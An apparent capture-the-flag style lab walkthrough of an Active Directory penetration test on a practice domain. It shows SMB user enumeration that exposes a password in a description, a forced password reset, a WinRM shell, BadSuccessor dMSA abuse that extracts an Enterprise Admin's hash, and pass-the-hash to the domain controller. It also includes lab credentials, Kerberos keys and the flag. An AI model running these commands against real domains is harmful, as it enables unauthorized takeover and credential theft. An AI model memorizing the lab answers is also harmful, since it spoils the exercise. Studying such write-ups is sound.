MidGarden2
Objective/Scope
As a member of the Hack Smarter Red Team, you have been assigned to this engagement to conduct a comprehensive penetration test of the client's internal environment.
The client has a mature security posture and has previously undergone multiple internal penetration testing engagements. Given our team's advanced expertise in ethical hacking, the primary objective of this assessment is to identify attack vectors that may have been overlooked in prior engagements.
Starting Creds
freyja : Fr3yja!Dr@g0n^12
Enum Shares
❯ nxc smb midgarddc -u freyja -p 'Fr3yja!Dr@g0n^12' --shares
SMB 10.1.42.97 445 MIDGARDDC [*] Windows 11 / Server 2025 Build 26100 x64 (name:MIDGARDDC) (domain:yggdrasil.hacksmarter) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.1.42.97 445 MIDGARDDC [+] yggdrasil.hacksmarter\freyja:Fr3yja!Dr@g0n^12
SMB 10.1.42.97 445 MIDGARDDC [*] Enumerated shares
SMB 10.1.42.97 445 MIDGARDDC Share Permissions Remark
SMB 10.1.42.97 445 MIDGARDDC ----- ----------- ------
SMB 10.1.42.97 445 MIDGARDDC ADMIN$ Remote Admin
SMB 10.1.42.97 445 MIDGARDDC C$ Default share
SMB 10.1.42.97 445 MIDGARDDC IPC$ READ Remote IPC
SMB 10.1.42.97 445 MIDGARDDC NETLOGON READ Logon server share
SMB 10.1.42.97 445 MIDGARDDC scripts
SMB 10.1.42.97 445 MIDGARDDC SYSVOL READ Logon server share
Enum Users
❯ nxc smb midgarddc -u freyja -p 'Fr3yja!Dr@g0n^12' --users
SMB 10.1.42.97 445 MIDGARDDC [*] Windows 11 / Server 2025 Build 26100 x64 (name:MIDGARDDC) (domain:yggdrasil.hacksmarter) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.1.42.97 445 MIDGARDDC [+] yggdrasil.hacksmarter\freyja:Fr3yja!Dr@g0n^12
SMB 10.1.42.97 445 MIDGARDDC -Username- -Last PW Set- -BadPW- -Description-
SMB 10.1.42.97 445 MIDGARDDC Administrator 2025-09-06 13:40:14 0 Built-in account for administering the computer/domain
SMB 10.1.42.97 445 MIDGARDDC Guest <never> 0 Built-in account for guest access to the computer/domain
SMB 10.1.42.97 445 MIDGARDDC krbtgt 2025-09-06 13:48:07 0 Key Distribution Center Service Account
SMB 10.1.42.97 445 MIDGARDDC Odin 2025-11-07 04:17:55 0 DA
SMB 10.1.42.97 445 MIDGARDDC Ymir 2025-09-06 14:28:27 0 EA
SMB 10.1.42.97 445 MIDGARDDC Thor 2025-09-06 14:27:54 0 Temp:Th0r!W!nt3rFang
SMB 10.1.42.97 445 MIDGARDDC Loki 2025-09-06 14:19:50 0
SMB 10.1.42.97 445 MIDGARDDC Frigg 2025-09-06 14:28:39 0
SMB 10.1.42.97 445 MIDGARDDC Baldr 2025-09-06 14:28:54 0
SMB 10.1.42.97 445 MIDGARDDC Hel 2025-09-06 14:29:05 0
SMB 10.1.42.97 445 MIDGARDDC Freyja 2025-09-06 14:29:16 0
SMB 10.1.42.97 445 MIDGARDDC Sif 2025-09-06 14:30:40 0 PC Specialist 2
SMB 10.1.42.97 445 MIDGARDDC Njord 2025-09-06 14:30:49 0
SMB 10.1.42.97 445 MIDGARDDC Skadi 2025-09-06 14:30:58 0 PC Specialist 2
SMB 10.1.42.97 445 MIDGARDDC Heimdall 2025-09-15 02:21:08 0 Seriously Secure service account for Yggdrasil services
SMB 10.1.42.97 445 MIDGARDDC Bragi 2025-09-06 14:31:19 0
SMB 10.1.42.97 445 MIDGARDDC Idunn 2025-09-06 14:31:34 0
SMB 10.1.42.97 445 MIDGARDDC Hodr 2025-09-15 02:21:08 0 Web Server Administrator
SMB 10.1.42.97 445 MIDGARDDC Forseti 2025-09-06 14:32:02 0
SMB 10.1.42.97 445 MIDGARDDC Ullr 2025-09-06 14:32:46 0 PC Specialist 1
SMB 10.1.42.97 445 MIDGARDDC Tyr 2025-09-06 14:40:00 0 PC Specialist 1
possible temp creds for Thor from description
SMB 10.1.42.97 445 MIDGARDDC Thor 2025-09-06 14:27:54 0 Temp:Th0r!W!nt3rFang
Valid Creds for THOR
❯ nxc ldap midgarddc -u Thor -p 'Th0r!W!nt3rFang'
LDAP 10.1.42.97 389 MIDGARDDC [*] Windows 11 / Server 2025 Build 26100 (name:MIDGARDDC) (domain:yggdrasil.hacksmarter) (signing:None) (channel binding:No TLS cert)
LDAP 10.1.42.97 389 MIDGARDDC [+] yggdrasil.hacksmarter\Thor:Th0r!W!nt3rFang
Gather Bloodhound Data
❯ nxc ldap midgarddc.yggdrasil.hacksmarter -u thor -p 'Th0r!W!nt3rFang' --bloodhound -c all --dns-server 10.1.42.97
❯ rusthound-ce --domain yggdrasil.hacksmarter -u thor -p Th0r!W!nt3rFang
Change Password for HODR
❯ nxc smb midgarddc.yggdrasil.hacksmarter -u thor -p 'Th0r!W!nt3rFang' -M change-password -o USER=hodr NEWPASS=tommy123
SMB 10.1.42.97 445 MIDGARDDC [*] Windows 11 / Server 2025 Build 26100 x64 (name:MIDGARDDC) (domain:yggdrasil.hacksmarter) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.1.42.97 445 MIDGARDDC [+] yggdrasil.hacksmarter\thor:Th0r!W!nt3rFang
CHANGE-P... 10.1.42.97 445 MIDGARDDC [+] Successfully changed password for hodr
Evil-WinRM Access as HODR
❯ ewp -i 10.1.42.97 -u hodr -p tommy123
_ _ _
_____ _(_| |_____ __ _(_)_ _ _ _ _ __ ___ _ __ _ _
/ -_\ V | | |___\ V V | | ' \| '_| ' |___| '_ | || |
\___|\_/|_|_| \_/\_/|_|_||_|_| |_|_|_| | .__/\_, |
|_| |__/ v1.5.0
[*] Connecting to '10.1.42.97:5985' as 'hodr'
evil-winrm-py PS C:\Users\Hodr.YGGDRASIL\Documents>
user.txt
evil-winrm-py PS C:\Users\Hodr.YGGDRASIL\Desktop> cat user.txt
Find C:\scripts
evil-winrm-py PS C:\> ls
Directory: C:\
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 4/1/2024 12:02 AM PerfLogs
d-r--- 11/6/2025 11:29 AM Program Files
d-r--- 4/1/2024 1:16 AM Program Files (x86)
d----- 9/14/2025 7:40 PM scripts
d-r--- 11/6/2025 8:13 PM Users
d----- 11/6/2025 8:33 PM Windows
evil-winrm-py PS C:\scripts> dir
Directory: C:\scripts
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 9/14/2025 7:40 PM 2134 create-dMSA.ps1
-a---- 9/14/2025 7:39 PM 1402 dmsa_find.ps1
-a---- 9/14/2025 7:39 PM 35 replicate-DCs.ps1
makes me think badsuccessor due to dmsa names in scripts
Check for Badsuccessor with Netexec
❯ nxc ldap midgarddc -u hodr -p 'tommy123' -M badsuccessor
LDAP 10.1.128.204 389 MIDGARDDC [*] Windows 11 / Server 2025 Build 26100 (name:MIDGARDDC) (domain:yggdrasil.hacksmarter) (signing:None) (channel binding:No TLS cert)
LDAP 10.1.128.204 389 MIDGARDDC [+] yggdrasil.hacksmarter\hodr:tommy123
BADSUCCE... 10.1.128.204 389 MIDGARDDC [+] Found domain controller with operating system Windows Server 2025: 10.1.128.204 (MidgardDC.yggdrasil.hacksmarter)
BADSUCCE... 10.1.128.204 389 MIDGARDDC [+] Found 1 results
BADSUCCE... 10.1.128.204 389 MIDGARDDC webServerAdmins (S-1-5-21-4282326175-1721253212-1354516517-1601), OU=Web Servers,OU=Yggdrasil Servers,DC=yggdrasil,DC=hacksmarter
webServerAdmins (S-1-5-21-4282326175-1721253212-1354516517-1601), OU=Web Servers,OU=Yggdrasil Servers,DC=yggdrasil,DC=hacksmarter
This is perfect. The user hodr is in the webServerAdmins group and can create objects in the OU OU=Web Servers,OU=Yggdrasil Servers,DC=yggdrasil,DC=hacksmarter
Verify Permissions for HODR
❯ bloodyad --host MIDGARDDC.yggdrasil.hacksmarter --user hodr --password tommy123 get writable
distinguishedName: CN=S-1-5-11,CN=ForeignSecurityPrincipals,DC=yggdrasil,DC=hacksmarter
permission: WRITE
distinguishedName: CN=Hodr,OU=Web Admins,OU=Yggdrasil Users,DC=yggdrasil,DC=hacksmarter
permission: WRITE
distinguishedName: CN=VanaheimWeb1,OU=Web Servers,OU=Yggdrasil Servers,DC=yggdrasil,DC=hacksmarter
permission: CREATE_CHILD
distinguishedName: CN=VanaheimWeb2,OU=Web Servers,OU=Yggdrasil Servers,DC=yggdrasil,DC=hacksmarter
permission: CREATE_CHILD
distinguishedName: OU=Web Servers,OU=Yggdrasil Servers,DC=yggdrasil,DC=hacksmarter
permission: CREATE_CHILD
use Impacket for the rest....
Badsuccessor.py
❯ badsuccessor.py -dmsa-name new_DMSA -target-ou 'OU=Web Servers,OU=Yggdrasil Servers,DC=yggdrasil,DC=hacksmarter' -action add 'yggdrasil.hacksmarter/hodr' -k -no-pass -dc-ip 10.1.212.77 -dc-host midgarddc.YGGDRASIL.HACKSMARTER -method LDAP -target-account ymir
Impacket v0.14.0.dev0+20251114.155318.8925c2ce - Copyright Fortra, LLC and its affiliated companies
[*] Connected to 10.1.212.77 as yggdrasil.hacksmarter\hodr
[*]
[*] ------------------------------ ------------------------------
[*] dMSA Name: new_DMSA$
[*] DNS Hostname: new_dmsa.yggdrasil.hacksmarter
[*] Migration status: 2
[*] Principals Allowed: hodr
[*] Target Account: ymir
Request Service Ticket to impersonate the new DMSA account (also gives "previous" users hash/keys)
❯ getST.py 'yggdrasil.hacksmarter/hodr' -dc-ip 10.1.212.77 -impersonate 'new_DMSA$' -k -no-pass -dmsa -self
Impacket v0.14.0.dev0+20251114.155318.8925c2ce - Copyright Fortra, LLC and its affiliated companies
[*] Impersonating new_DMSA$
[*] Requesting S4U2self
[*] Current keys:
[*] EncryptionTypes.aes256_cts_hmac_sha1_96:951e48097bfc1189da830c26faba900f256197e1accba076b8327755ec825a01
[*] EncryptionTypes.aes128_cts_hmac_sha1_96:a20c635617d998d26fb99fb5e4d472b9
[*] EncryptionTypes.rc4_hmac:21316a87e36cfa4b1abef45013f4662f
[*] Previous keys:
[*] EncryptionTypes.rc4_hmac:8dd4cfe0f89272424e50f5089b8696ec
[*] Saving ticket in new_DMSA$@krbtgt_YGGDRASIL.HACKSMARTER@YGGDRASIL.HACKSMARTER.ccache
### get hash of previous user AKA ymir ###
[*] Previous keys:
[*] EncryptionTypes.rc4_hmac:8dd4cfe0f89272424e50f5089b8696ec
root.txt
❯ ewp -i midgarddc -u ymir -H 8dd4cfe0f89272424e50f5089b8696ec
evil-winrm-py PS C:\Users\Administrator\Desktop> cat root.txt
AEA41460BEE0E3291F7C4D7E4F356EE0